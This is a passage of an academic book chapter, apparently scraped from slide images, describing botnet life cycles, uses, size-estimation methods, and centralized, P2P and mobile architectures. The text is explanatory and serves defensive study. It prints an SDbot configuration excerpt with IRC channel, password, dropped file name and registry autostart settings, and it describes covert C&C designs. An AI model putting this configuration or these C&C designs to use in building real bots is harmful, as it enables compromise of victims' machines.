![1.1 Introduction
In recent years, cybercrimes that are associated with botnets have been considered
a major threat to the Internet and technology. A botnet consists of a number of
infected hosts and receive commands from a botmaster [1]. The botnet is
basically formed by installing bots on vulnerable computers. Bots are software
programs that perform actions upon receiving commands from users or programs.
Bots usually stay in a passive state until they receive commands from the
botmaster (a hacker). Bots are designed to establish and utilize available commu-
nication channels that enable them of receiving commands, executing commands,
and periodically reporting data back to the botmaster. Reports include their status
and statistical information. Furthermore, bots are usually programmed to keep up
to date with the latest bot version. The botmaster maintains control over the
botnet through the command and control (C&C) communication channel that
represents the core of the botnet.
Generally, bots try to exploit software vulnerabilities that allow malicious
programs to infect computing systems. Examples of software vulnerabilities are
buffer overflow, backdoor installations, software bugs, and unsecured memory
management mechanisms. Releasing bot codes to the public results in spreading
of many variants of the bot within a short time [2–5]. Making the bot’s source
code available makes it easier for hackers to extend it and develop more
sophisticated codes to serve their objectives. For example, Agobot is structured
in a modular design, which makes it attractive for botnet’s developers. According
to [2], there exist different types of bots and different variants of each type in
today’s digital computing world. Hackers are always interested in discovering new
software vulnerabilities and in improving their bots to higher level of sophistica-
tion. Hence, it is expected that more bots will evolve and pose serious threats.
This urges companies and researchers to develop efficient countermeasure meth-
ods to stop the cybercrimes that are posed by botnets. Botnets represent a major
contributor to malicious traffic in today’s Internet [1].
Moreover, the botnet attack landscape has increased tremendously in recent
years because of new highly sophisticated versions of botnets. The development of
botnet architectures and types are driven by hackers’ interest, the expansion of the
Internet, and the Internet technology development. Organized hacking groups,
organizations, and cyber criminals are increasingly threatening businesses, where
about one-third of the world companies have experienced the threat of cyber-
crimes [6]. Botnets are being used extensively for malware distribution to target
banking sectors [7]. Botnets provide hackers with a platform for personal profit
and financial gain through extortion, ransom-ware, and cryptocurrency. Cyber-
attacks are also targeting critical Internet infrastructure and cyber-physical
systems, including smart grids, nuclear plants, and transportation systems. In
addition, botnets are expected to take a role in future cyber wars. With the
2 ■ Botnet](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-19-320.jpg)
![tremendous expansion of the Internet, botnets are no longer limited to infect
only PCs and laptops. Several types of botnets have appeared in recent years such
as smartphone, Internet of Things (IoT), and social botnets. The enormous
growth of botnets enabled hackers to use them for different forms of malicious
activity including distributed denial-of-service (DDoS) attacks, email spam, click-
fraud, and identity theft. In this context, botnets can be viewed as an attack
infrastructure that is used to launch several types of cybercrimes. This chapter is
focused on the emerging and predominant threat of botnets. In Section 1.2, we
provide a detailed description of botnets and we discuss their main characteristics.
Section 1.3 discusses centralized botnets. Section 1.4 explains peer-to-peer (P2P)
botnets. Section 1.5 presents mobile botnets. Section 1.6 provides a description
on IoT-based botnets. Social botnets are presented in Section 1.7. Finally, the
conclusion is presented in Section 1.8.
1.2 Botnets Main Characteristics
A botnet can be viewed as an attack infrastructure that consists of compromised
hosts that are connected together to form a network using a variety of application
layer protocols, such as IRC, HTTP, email, and P2P protocols. In this section,
we discuss botnet life cycle, explain their malicious usage, discuss their main
characteristics, and illustrate different approaches that are used to obtain insight-
ful information about botnets.
1.2.1 Overview
A botnet’s life time consists of three main stages as follows.
Stage 1—recruitment stage: The botnet formation starts by recruiting as many
vulnerable machines as possible to become part of a botnet. This is done through
infecting machines with the bot code using different mechanisms. One of the
mechanisms adopts traditional worm propagation techniques to spread botnet
malware [8,9]. This approach does not require any user intervention. An infected
machine has the ability to search for other vulnerable machines on the Internet
through active scanning for holes of known vulnerabilities. There are several
mechanisms to recruit vulnerable machines in a passive manner where user
interventions are required. Social engineering is a powerful mechanism that is
used by botmasters to convince end users to download bot binaries [10,11]. This
is usually achieved by sending out massive phishing campaigns through email and
social networks (e.g., Twitter, Facebook), where a user is tricked to click on
a malicious link that results in downloading of a bot binary [12,13]. In other
cases, the malware may spread as an email attachment or by tricking the user to
visit websites that have active content such as JavaScripts or ActiveX controls.
Botnet Architectures ■ 3](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-20-320.jpg)
![When a user visits a website that contains malicious active contents, the malware
is installed automatically. It is also possible to spread botnets’ binaries through
physical media (e.g., USB flash drive), where the malware is usually in the form
of an executable and starts running as soon as the user double click on it. Physical
media infection aims to compromise machines with private IP address that are
unreachable directly from the Internet (e.g., behind a NAT box).
Stage 2—C&C stage: The botmaster maintains a control over the infected
machines (bots) through a C&C channel. The architecture of the botnet depends
on the implementation of the C&C channel. In centralized botnets, the botmaster
controls its botnet through a central server known as the C&C server. In P2P
botnets, there is no central server between the botmaster and botnet machines.
Hence, the botmaster communicates directly with a small subset of botnet machines.
These machines in the subset serve as mailboxes between the botmaster and other
botnet machines. The machines are located using the inherent features of the P2P
protocol that is used to implement the botnet. More details of centralized and P2P
botnets are provided in Section 1.3 and Section 1.4. The communication style
between the botmaster and the bots can be a Push or a Pull style. In the Push style,
commands are sent directly to the bots. In the Pull style, bots (infected machines)
keep checking for new commands periodically [14]. The two communication styles
are illustrated in Figure 1.1.
Stage 3—botnet activity stage: The botnet activity represents the set of actions and
attacks (e.g., DDoS, scanning, etc.) that are performed by bots in response to
commands that are issued by the botmaster [15–17]. A compromised host’s
bandwidth is an important information that indicates the host’s capability in
launching attacks, especially DDoS. Hence, bots estimates the host’s bandwidth by
sending data to many servers. Figure 1.2 shows an example of an IRC-based botnet
Commands
Botmaster
Botnet
Any command?
Botmaster
Botnet
(a) Push Style (b) Pull Style
Figure 1.1 Botnet communication styles: (a) Push style (b) Pull style.
4 ■ Botnet](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-21-320.jpg)
![activity in response to a set of commands that were issued by the botmaster. The
figure shows the interaction between a botmaster (nickname seed) and one of the
bots (nickname vofm) in an IRC chat channel (#nes554). This is a typical example of
a push style communication where the botmaster issues certain commands that are
sent to the bot directly. For example, the command
.open notepad
instructs the bot to run notepad.exe. Running notepad application is just an
example that shows the capabilities of this botnet. Botmasters instruct bots to run
malware binaries after downloading them from a given server. Other example
involves instructing the bot to perform a DNS query for a given host name and
return the result to the botmaster.
Understanding botnets and their operational aspects require us to investigate
different bots to reveal their malicious intents [2]. For example, P. Barford et al.
studied the source codebases for the four major botnets Agobot, SDBot, SpyBot, and
GT Bot [18]. Analyzing bots’ source code or running a botnet malware instance in
a sandbox are efficient methods to identify botnet features and capabilities including
the C&C mechanisms. In general, botnets are considered as major sources of
different types of attacks and malicious activities in the Internet. This includes the
following:
Figure 1.2 Example of an IRC-based botnet activity.
Botnet Architectures ■ 5](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-22-320.jpg)
![■ DDoS attacks: Botnets are used to launch several forms/types of DDoS attacks,
such as application layer attacks (e.g., HTTP-based attacks), SYN flooding, and
DNS amplification attacks. Bots are instructed to overwhelm the target system
with a high volume of traffic rate (e.g., HTTP requests, SYN packets, and DNS
requests).
■ Email spam campaigns: This belongs to sending a large amount of spam
emails, which results in a traffic that decreases the signal-to-noise measure
[19]. Email spammers usually use botnets for massive email spam campaigns
to advertise pharmaceutical products, adult content, and malware distribu-
tion. An email spam template is distributed along with an email recipients’
list to the workers (bots). The bots are then instructed to send spam with
the contents that are specified in advance by the spammer.
■ Identity theft: Botmasters have the ability to collect sensitive information
(such as email accounts, banking accounts, and credit card numbers) from
the bot machines.
■ Cryptocurrency: The computing power of the machines that belong to a
botnet can be utilized by botmasters to perform cryptocurrency mining to
obtain bitcoins in an illegal way.
■ Click-Fraud: Whereby a botmaster generates bogus clicks for online adver-
tisements (usually utilizing the field of the HTTP request header) that
mimic legitimate request patterns, which results in large sums of money to
be paid by the advertisers [20]. Online advertisement is becoming very
popular where the pricing model for this type of advertisement is usually
based on pay-per-click approach, meaning that the revenue for the adver-
tisement platform (e.g., Facebook, Google) depends on the number of clicks
that are made through the advertisement platform. Unfortunately, several
hackers exploit this model and use botnets to perform fraudulent clicks.
Based on the above discussion, botnets have two main planes of operation, which
are: (i) the C&C plane where bots are continuously waiting for commands from
the botmaster, and (ii) the activity plane, which involves the execution of the
received commands to launch different attacks such as DDoS, cryptocurrency,
spam campaigns, and clicks fraud. The C&C topology determines the method of
commands’ delivery. In centralized botnets, the botmaster communicates with the
bots through a central server, while in P2P botnets, the botmaster communicates
with the bots through a subset of bots (mailboxes).
1.2.2 Characterizing Botnets
There have been considerable research efforts to characterize botnets and understand
their operations (e.g. [1,15,18,21–23],). These studies focused on estimating botnet
sizes, geographical distributions, and their spatial and temporal characteristics. Such
6 ■ Botnet](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-23-320.jpg)
![characterization was accomplished through conducting post-term analysis of traffic
traces and packet logs to gain an insight on the nature of this threat. Also, the
community is interested in finding botnets formation techniques. Based on these
research studies, the main characteristics of botnets are described further.
1.2.2.1 The Botnet Size
The size of a botnet represents an important factor of the intensity and the
widespread of cyberattacks. The importance of this metric and its role in measuring
the botnet effectiveness have been discussed in [24]. While large botnets are viewed to
be a serious threat to the Internet services, small botnets are also a threat especially for
attacks that do not require a large amount of traffic such as ransomware and identity
theft. Small botnets can be easily managed, rented, and stay undetected. Determining
the actual botnet’s size is an important issue because it leads to a better understanding
of the threat. In this context, a botnet size has been a point of debate because it is
unclear what the term “botnet size” exactly means.
The ambiguity in specifying a botnet size is due to several issues that complicate
the task of computing the number of compromised machines in a botnet. The join-
leave actions of bots result from (i) turning infected machines ON and OFF by their
users, (ii) temporary bot migration, in which botmasters ask bots to leave one botnet
and join a different botnet, and (iii) cloning, where bots make replicas of themselves
and connect to different channels or servers [1]. Most researchers agree that a clear
definition for a botnet size must be used. Here we adopt the definition that is used in
[24] which states: Botnet size is defined as the largest connected portion of the botnet
[24,25]. This does not represent the count of all infected machines within a botnet. It
mainly represents the count of online bots (the machines that are currently active).
There are several techniques to determine the size of a botnet. These mainly
depend on the botnet architecture and the ability to infiltrate or takeover the botnet.
The following are the techniques that are typically used to estimate a botnet size [25]:
■ Botnet infiltration: The main idea of this technique is to join the C&C
channel of a botnet (e.g., to connect to the IRC server of a botnet), then to
record the number of bots that are connected to the channel simulta-
neously. This can be achieved by implementing an IRC tracker (similar to
the one presented in [1]) that mimics the operation of an actual bot.
■ DNS redirection: This method redirects connections that are made to the
botnets’ C&C server to another server (e.g., a sinkhole) through manipulat-
ing the DNS entry that is associated with the server [26]. By completing the
three way TCP handshake procedure with connected bots, the sinkhole can
identify these bots and record their IP addresses. This technique has the
limitation of counting bots that attempt to connect to the C&C server
Botnet Architectures ■ 7](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-24-320.jpg)
![during the measurement period. Also, in cases where the botmaster uses
multiple channels on the same C&C server, it is not possible to identify
bots that belong to a certain channel. Finally, Zou et al. [27] explain that
botmasters can easily detect this technique and redirect the bots to connect
to a different IRC server.
■ DNS cache snooping: This method collects information from thousands of
Domain Name Systems (DNS). It searches the DNS servers’ caches for
entries of a botnet’s C&C server. M. Aburajab et al. have used this method
successfully and were able to estimate botnet sizes [1]. In most cases, bots
need to resolve the IP address of the C&C server by querying the DNS
server. Therefore, the size of the botnet can be computed by probing a large
collection of DNS servers and the cache hits are reported. The list of
available DNS servers can be obtained by performing a fast Internet wide
scanning (e.g., using Zmap [28]). A cache hit on a DNS server indicates
that there is at least one bot who sent a query request to the server before
the expiration time of the corresponding botnet entry. The number of cache
hits serves as a lower bound that represents the number of the bots.
■ Crawling P2P botnets: Botnet size estimation in P2P botnets is done mainly
by crawling the botnet recursively. Starting with one bot, a request is issued
to get its peer-list. A request is then issued for each IP address in the peer
list. This process continues in a recursive manner until no additional IP
addresses are observed. The crawling speed is important as the structure of
P2P botnet graph changes frequently. Bots join and leave in unpredictable
way. This phenomena occurs during the time of sending and analyzing peer
list requests. Hence, crawling must be done very quickly to get an accurate
snapshot of the current P2P graph.
1.2.2.2 Geographical Distribution of Botnets
Although bots can be found anywhere in the Internet, research studies show that they
are concentrated in particular regions in the world [26]. There are several factors that
affect the geographical distribution of botnets. One of these important factors is the
underlying bot infection propagation mechanism that involves a region or
a language. Some botnets attack applications of a specific language or perform social
engineering activities of a specific regional’s language [26].
The distribution of bots in the Internet represents an important issue because
it can assist in developing efficient countermeasures [22,23,29]. This distribution
is mainly influenced by the distribution of vulnerable machines in the Internet. It
is believed that vulnerable machines tend to cluster in certain networks, which
suggest that bots will cluster in these networks as well, regardless of the method
that is followed by botmasters in constructing botnets. This is based on the
8 ■ Botnet](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-25-320.jpg)
![observation that the population of vulnerable machines in a given organizational
network depends directly on the nature of network security policies that are
enforced by the organization, and on the level of awareness of users regarding
hardening and protecting their own machines. For example, an organization that
enforces strict security policy deploys the latest technology to prevent security
breaches, and provides its employees with the state-of-the-art virus scanners, is
expected to have very small number of vulnerable machines.
M. P. Collins et al. explain that botnets have the following two character-
istics [22]:
■ Spatial uncleanliness: When there is a compromised host in a network, there
is a high chance of finding other hosts that are compromised and perform
hostile activities within the same network. This clustering of hostile activ-
ities within a network results in having an unclean network.
■ Temporal uncleanliness: If there is a compromised host in a network, then this
host or other hosts within the network are likely to be compromised in the
future. Hence, the hosts in the network will undergo hostile activities over time.
The test for spatial uncleanliness was conducted through the examination of IP
addresses clustering within different networks. It has been found that compromised
hosts within equally sized networks are more likely to appear than hosts and addresses
that were chosen at random from the Internet population. On the other hand, the test
for temporal uncleanliness was conducted through the examination of unclean net-
works. Networks that contain compromised hosts are found to be able to predict future
hostile activities with a higher accuracy than networks that were chosen at random.
1.2.2.3 Spatial-Temporal Correlation and Similarity
In addition to the spatial uncleanliness and temporal uncleanliness described above,
botnets are generally characterized by spatial-temporal correlation that follows
directly from their inherent features. During a certain time interval, bots within an
organizational network perform similar operations in response to commands that are
issued by the botmaster. Typically, these bots maintain long lived connections with
the C&C server and remain standby for commands. Two types of responses were
observed when bots receive commands from the botmaster:
■ Message response: There are certain commands that are used by the botmaster to
obtain information about the bot machine. This information includes the
operating system version, CPU architecture, bandwidth, and the bot ID. Bots
typically respond with short messages that contain the requested information.
Figure 1.3a shows an example of message responses of three bots within an
organizational network.
Botnet Architectures ■ 9](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-26-320.jpg)
![■ Activity response: Some other commands that are issued by the botmaster are
associated with specific activities such as scanning, denial of service attacks,
and email spam. Therefore, each bot generates a large amount of traffic of
certain type during the same time interval. Figure 1.3b shows an example of
activity responses of three bots within an organizational network in response
to different commands that are sent by the botmaster.
1.3 Centralized Botnets
Most of the botnets (e.g., sdbot, agobot, GTbot) that appeared in the beginning of
botnets era have adopted a centralized architecture. In this architecture, the botmaster
maintains a central server that communicates with the bots. The bots wait for
commands from the central server. In addition, newly compromised hosts (bots)
connect to the server and report their information. The server oversees the status of
the bots and sends commands to be executed. This basic structure is shown in
Figure 1.4.
In centralized botnets, the C&C channel can be implemented using different
protocols such as IRC (Internet Relay Chat), HTTP (Hyper Text Transfer Protocol),
and Email. Recently, an advanced technique that is based on the Session Description
Protocol (SDP) was proposed in [30] for the implementation of botnet’s C&C
channel. The technique uses the SDP to construct a covert communication channel,
which results in a stealthy and an effective method for controlling a botnet. The
Bot
Bot
Bot
time
time
time
Bot
Bot
Bot
time
time
time
Message response (e.g. Bot ID) Activity response (e.g. SYN attack)
Activity response (e.g. Port scanning)
(a) Message response crowd (b) Message response crowd
Figure 1.3 Spatial-temporal correlation and similarity. Figure is adopted from [14].
10 ■ Botnet](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-27-320.jpg)
![growing interest in SDP as part of the session initiation protocol (SIP) in VoIP
networks requires the research community to develop efficient detection and mitiga-
tion mechanisms as described in [31].
1.3.1 Case Study: IRC-based Botnets
IRC-based botnets represent one of the most popular types of centralized botnets
that have appeared in the early stages of the botnets threat. There are several
families of IRC-based botnets such as SDbot and Agobot. The release of the bot
code to the public has allowed new variants of each family to appear within a short
period of time. These botnets share similar characteristics and were used for
different types of attacks. IRC-based botnets utilize the communication capability
of the IRC protocol, which allows point-to-point and point-to-multi-point com-
munications. The protocol is scalable in the sense that it enables a large number of
hosts to transfer data. The availability, flexibility, and modularity of the IRC
protocol allow users to make modifications and use it in their applications.
Hence, developers of botnets tend to use the IRC protocol to shorten their botnet
development time while providing efficient communication protocol. As shown in
Figure 1.5, the IRC-based botnet life cycle follows five steps, which are [1]:
1. Scanning for vulnerable hosts: Usually, the bot code is designed to automatically
search for vulnerable hosts. This makes it similar to Internet worms, which
means that worm scanning strategies can be adopted in the process of a botnet
formation.
Botmaster
C&C server
Botnet
Figure 1.4 Centralized botnet.
Botnet Architectures ■ 11](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-28-320.jpg)
![// bot configuration
const char botid[] = “bot1”; // bot id
const char password[] = “password”; // bot password
const int maxlogins = 4; // maximum number of simultaneous logins
const char server[] = “ircserver”; // server
const int port = 7777; // server port
const char serverpass[] = “”; // server password
const char channel[] = “#nes554”; // channel that the bot should
join
const char chanpass[] = “”; // channel password
const char server2[] = “”; // backup server (optional)
const int port2 = 6667;//backup server port
const char channel2[] = “”; // backup channel (optional)
const char chanpass2[] = “”; // backup channel password (optional)
const BOOL topiccmd = FALSE; // set to TRUE to enable topic commands
const BOOL rndfilename = FALSE;//use random file name
const char filename[] = “nes554SDbot.exe”; // destination file name
const BOOL regrun = TRUE; // use the Run registry key for autostart
const BOOL regrunservices = TRUE; // use the RunServices
registry key for autostart
const char valuename[] = “Configuration Loader”; // value name
for autostart
Figure 1.5 IRC-based botnet life cycle. Figure is adopted from [1].
Botnet Architectures ■ 13](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-30-320.jpg)
![const char prefix = ’.’; // command prefix (one character max.)
const char version[] = “sdbot v0.5b by [sd]”; // bot’s VERSION reply
const int cryptkey = 0;//encryption key (not used right now)
const int maxaliases = 16; // maximum number of aliases.
Once the bot joins the C&C channel, it becomes ready to receive and execute
commands. For example, the botmaster may instruct the bot to perform SYN flood
attack against a certain target, or to download a certain malicious file from the Internet.
For better management, botmasters usually adopt a hierarchical structure rather than
the basic centralized structure. In a hierarchical topology, the botmaster controls a set of
machines that are called bot controllers. Each of the bot controllers manages a set of
bots. Using multiple botnet controllers make the C&C channel more resilient.
Centralized botnets (both basic and hierarchical) are easier to be created and managed.
Moreover, they respond to commands faster than the P2P structure. However,
botmasters lose the control over the C&C channel once it gets shutdown by detection
and isolation methods. In addition, if the C&C server is hijacked, the botnet structure
and behavior are discovered. Hence, some active monitoring techniques are employed
to discover malicious traffic and activities of public IRC servers [1,21,32].
1.4 P2P Botnets
The design of centralized botnets has a major drawback of having a single point
of failure. Therefore, some attackers used a P2P technology for C&C, where each
bot communicates with a subset of other bots in the network [33–35]. The
improvement of P2P technology and the widespread of P2P file sharing have
attracted botmasters to adopt this technology in constructing a new generation of
botnets with inherited features of robustness, scalability, and resilience. Table 1.1
lists some of the most popular P2P botnets that appeared in the wild and
remained active for a long period of time.
P2P botnets are more complex when compared to the traditional centralized
botnets. In this architecture, bots reside on compromised machines within the
botnet network and communicate with each other rather than through a C&C
server. Hence, the bots in the network send commands to each other. Each bot
keeps a list of its neighbors. When receiving a command from one of its
neighbors, the bot sends that command to the other neighbors in the list. This
scenario results in a network that is called a zombie network. Once a botmaster
gets an access to one host in the zombie network, the botmaster obtains a full
control of the botnet network. Each host in the P2P network acts as both a client
and a server, since there is no centralized point in this architecture.
P2P communication provides the attackers with higher capabilities than the
centralized C&C architecture. In P2P botnets, if defenders are able to discover
14 ■ Botnet](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-31-320.jpg)
![a subset of the bots and isolate them, the communication among the rest of the
bots is not disrupted. From a botmaster’s perspective, it is more difficult to
create and manage P2P botnets. Moreover, it takes more time to propagate
C&C messages to all botnet members. Hence, botmasters prefer to use simple
designs when developing P2P C&C channels. For example, Phatbot stores the
list of bots in Gnutella cache servers. This makes it possible to discover the
botnets by probing the cache servers. On the other hand, Sinit uses random
probing in order to find the bot members. In P2P botnets, if the IP address of
a bot is changed (dynamic IP addresses), then the bot leaves the botnet
network [32].
Typically, P2P C&C channel is implemented using existing P2P file sharing
applications, such as Gnutella, Kazaa, and eMule, or can be implemented using
proprietary protocols. The basic structure of P2P botnet is shown in Figure 1.6.
Table 1.1 Popular P2P botnets
Botnet Year C&C Main activity
Nagache January 2006 Based on custom
protocol
Theft of financial credentials
via keystroke logging
Storm [37] January 2007 Based on Overnet,
a Kademlia
implementation
Email spam and DDoS
attacks via keystroke logging
Sality [38] January 2008 Unstructured P2P
network
Stealthy scanning targeting
critical
Voice communications
infrastructure
Waledac [39] December 2008 HTTP
communication and
a fast-flux based
DNS network
Email spam
ZeroAccess v1 July 2009 Unstructured P2P
architecture
Bitcoin mining and click
fraud
ZeroAccess v2 February 2012 Unstructured P2P
architecture
Bitcoin mining and click
fraud
Kelihos v1 [40] December 2010 Unstructured P2P
botnet
Email spam and ID theft
Miner [41] August 2011 Unstructured P2P
botnet
Bitcoin mining
Zeus [42] September 2011 Unstructured P2P
botnet
Steal credentials (particularly
for financial institutions)
from infected systems
Botnet Architectures ■ 15](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-32-320.jpg)
![P2P botnets can be represented as a graph with bots being the vertices and the
links between bots are the edges. For example, in Zeus, each bot in the graph has
a peer-list [36]. Each bot knows a subset of bots and maintains connections to
them. A peer-list request is issued by a bot when it starts to loose connections
from its original list. A bot that receives a peer-list request shares its peer-list with
the bot requesting this information allowing that bot to expand its own peer-list.
However, in most P2P botnets, the architecture is not entirely P2P as it includes
a central server for bootstrapping and getting initial peer-lists such as in Zeus
[36]. In the following subsection, we present ZeroAccess botnet as a case study of
P2P botnets.
1.4.1 Case Study: ZeroAccess P2P Botnet
ZeroAccess (ZA) is a popular and complex P2P botnet. Two versions of the ZA
malware appeared in September 2011 (ZAv1) and April 2012 (ZAv2). The two
versions have infected millions of machines at that time [43]. ZA botnet malware
is considered to be a remarkable botnet because of many features in its design and
operation. This includes its ability to infect both Windows 32-bit and 64-bit
machines, being able to hide itself and stay on the infected system, the P2P C&C
channel structure where nodes are labeled as “supernodes” or as “regular nodes,”
and the use of encryption and obfuscation to hide its communication patterns.
ZA malware rootkit evolved over time with new functionalities and features that
were introduced subsequently. In the following, we discuss the main steps of ZA
Botnet
Botmaster
Figure 1.6 Basic architecture of P2P botnets.
16 ■ Botnet](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-33-320.jpg)
![technology is improving the battery life time of mobile devices, which allows
them to withstand high computations and network demands.
Smartphones are becoming very popular in recent years. At the same time, a new
generation of malware that targets these devices has evolved and is becoming a major
threat for this technology. In most cases, this malware aims at constructing smart-
phone botnets. A smartphone botnet is a group of compromised smartphones that
are remotely controlled by botmasters via C&C channels [44]. These botnets provide
attackers with capabilities to perform many nefarious activities that greatly violates
users’ privacy. This includes but not limited to, installing new applications, request-
ing a URL from the phone, sending spam, achieving financial gains by sending
premium SMSs, making phone calls, spying on users, and displaying ads and
notifications. The main factors that make smartphones (e.g., iPhone and Android-
based phones) an attractive target for attackers include:
■ High adoption rate of smartphones. With the emergence of mobile Internet
access and the proliferation of mobile applications, smartphones have witnessed
significant technological advancements. Smartphone prices have dropped sig-
nificantly while sales have increased sharply in recent years [45]. It is expected
that the sales will increase in the coming years especially in the emerging
markets. This provides a prolific environment for hackers to construct mobile
botnets.
■ Computational power of smartphones. Today’s smartphones have computa-
tional power and communication capabilities (in terms of memory, CPU,
and transmission rate) that outperform some generations of PCs. This
makes them a very attractive target in order to perform different types of
nefarious activities such as sending spam and performing DDoS attacks.
■ Sensitive information available on smartphones. The private information that
users save on their smartphones make them a valuable target for attackers.
A smartphone can be viewed as a personal wallet that contains highly sensitive
information that includes banking accounts, credit card numbers, personal
pictures, phone calls, private messages, GPS location, and access to phone
camera.
■ Smartphones can be easily infected by malware. Smartphone users tend to
accept downloads from untrusted sources. Attackers usually inject malicious
codes into mobile applications before uploading them to the Android market.
■ Lack of security protection for smartphones. The security market for smart-
phones is still immature with a limited number of antimalware or antivirus
products that are designed to address vulnerabilities in smartphone and for
malware detection. This means that a malware that targets smartphones can go
without being detected in most cases.
■ Internet connectivity. Smartphones are usually connected to the Internet
most of the time either through WiFi networks or data services. Users
Botnet Architectures ■ 19](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-36-320.jpg)
![tend to keep their smartphones turned on with Wifi or data connection
being enabled in order to stay connected and have access to their favorite
social networking applications.
■ C&C implementation. Mobile botnets in general and smartphone botnets in
particular offer new approaches for C&C implementation that were unavail-
able for PC-based botnets. Instead of relying on traditional application layer
protocols (e.g., HTTP, IRC, and file sharing applications) for C&C imple-
mentation, other techniques, that are specific to the mobile phone technology,
can be used for the C&C implementation. This includes short messaging
services (SMS), push notification services that are available in mobile applica-
tions, short URL services, and Bluetooth.
It is important to mention that there are some limitations regarding mobile botnet
construction. These limitations include: (i) Smartphones are battery limited, which
requires botmasters to account for bot devices that are running out of power. This
has an impact on the operation of the mobile botnet, especially when mobile botnets
are involved in activities that require high processing and communication capabil-
ities. If the battery power of a device drops faster than a normal behavior, then the
user may suspect that there is something wrong with his/her phone. (ii) Also, mobile
botnets are usually involved in an increasing consumption of data usage or SMS
messages leading to an additional billing cost. (iii) Smartphones are assigned private
IP addresses rather than public IP addresses, which restricts the creation of C&C
channel when compared to the PC-based botnets.
The life cycle of mobile botnets is very similar to that of the traditional PCs based
botnets in terms of the main stages as described in Section 1.2. Also, mobile botnet
architecture can be centralized or distributed (P2P) in a way similar to traditional
botnets. However, there are major differences in C&C channel implementation,
infection vectors, and approaches. This is due to the additional features that are
available in smartphones such as Bluetooth, SMS, GPS sensor, and notification
services. Some mobile botnets that appeared in the early period of mobile botnets
have used conventional HTTP-based C&C channel for communication. For exam-
ple, SymbOS.Yxes botnet appeared in 2009 to target the Symbian platform [46],
Ikee.B mobile botnet that targeted jailbroken iPhones in 2010 [47], and GEINIMI
mobile botnet, which is considered to be the first Android botnet [48]. Subsequently,
other techniques that are specific to mobile phones were exploited to implement the
C&C channel for communication. ZeuS, for example, is an SMS-based botnet that
targets Blackberry, Windows, and Symbian mobile platforms [49]. In addition,
public blogs were used to implement the C&C channel of an Android botnet,
which is called AnserverBot, in 2011 [50]. Advanced C&C architectures for mobile
botnets were proposed in [51]. These architectures leverage Tor’s Hidden services
and DNS protocol to obfuscate attackers’ identity and increases the botnet’s
resiliency.
20 ■ Botnet](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-37-320.jpg)
![1.5.1 Examples of Mobile Botnets
In this subsection, we provide a description about SMS-based mobile botnets and
cloud-based push-styled mobile botnets. These two types of botnets represent
typical examples of mobile botnets that employ C&C mechanisms.
1.5.1.1 SMS-based Mobile Botnets
The design and implementation of SMS-based smartphone botnet were presented in
[52]. In this type of botnets, commands are delivered to infected smartphones (bots)
via SMS without being noticed by phone users. Each command is encoded in a fixed
size text message. Bots read these messages, decode them, and act to execute the
commands according to a database that is known for the bot during the installation
phase. Using SMS messages for C&C control provides more resilience and is
considered more suitable for smartphone botnets due to several reasons: (1) It does
not require Internet connectivity. Even if the phone goes offline or becomes outside
a coverage area, commands are buffered at the service center and delivered when the
phone becomes reachable. (2) SMS is a very popular service and among the top used
data applications in the world. (3) Usually, smartphones have private IP addresses
because they connect to access points or cell towers. Therefore, using SMS for C&C
provides a suitable mechanism to deliver commands to bot machines even if they are
unreachable by their private IP addresses. (4) It is difficult for a user to distinguish
between SMS messages that are related to a botnet activity and spam SMS messages.
A unique passcode is hard-coded in the bot binary in order to identify each bot.
While it is possible to include a unique passcode for each bot, the design in
[52] suggested that each group of bots, which is responsible of the same botnet
activity (e.g., Spam, ID theft, etc.), have the same passcode. The hard-coded
passcode in a bot binary is included in SMS messages that are sent and received
by that bot. To achieve stealthy operation, a malicious Android application,
which is installed on each bot, registers itself as a background process in order to
be able to send out SMS messages, get notified when receiving SMS message,
read received messages, decode them, and finally delete them to avoid being
noticed by the phone owners.
1.5.1.2 Cloud-Based Push-Styled Mobile Botnets
Cloud-based push-styled mobile botnets was presented in [53]. Push notification is
a service that is widely available on smartphone platforms. In this service, mobile
applications receive notifications messages from the application servers through push
based messaging servers that are hosted in the cloud. There are several advantages for
